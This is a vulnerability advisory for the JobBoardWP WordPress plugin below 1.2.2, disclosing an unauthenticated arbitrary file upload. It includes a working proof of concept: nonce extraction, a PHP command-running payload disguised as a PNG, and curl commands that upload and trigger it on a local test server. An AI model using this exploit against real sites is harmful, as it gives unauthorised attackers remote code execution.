wpexploit / cydave / WPEX-ID:FEC68E6E-F612-43C8-8301-80F7AE3BE665
Published: Nov 28, 2022

JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload

Tags: jobboardwp, unauthenticated, file upload, security, vulnerability, payload, nonce, curl, exploit

EPSS: 0.001 (percentile 46.6%)

The plugin does not properly validate file names and types in its file upload functionality, allowing unauthenticated users to upload arbitrary files, such as PHP scripts, to the web root.

Setup:

1. Install the vulnerable plugin (jobboardwp version 1.2.1)
2. In the toast message that appears on the plugin's installation page, create the required pages for the plugin to work properly

Attack:

1. As an unauthenticated user, extract the nonce from the "Jobs" page (by default /?page_id=5): view the page source and search (CTRL+F) for "jb_front_data"; the nonce is inside that inline JavaScript object
2. Prepare a payload you want to upload, ensure that the filename ends with ".png":

echo '<?php passthru("id"); ?>' > /tmp/payload.png

3. Invoke the following curl command, with the nonce embedded, to upload the payload. The multipart filename ends in ".png", but the file is stored under the name given in the `jb-logo-upload` cookie (here payload.php):

curl 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=jb-upload-company-logo' \
    -H 'Cookie: jb-logo-upload=payload.php' \
    -F 'nonce=<NONCE>' \
    -F 'chunks=1' \
    -F 'file=@/tmp/payload.png'

4. Trigger the payload by accessing it (the location of the payload is returned by the curl command above):

curl 'http://127.0.0.1:7777/wp-content/uploads/jobboardwp/temp/payload.php'

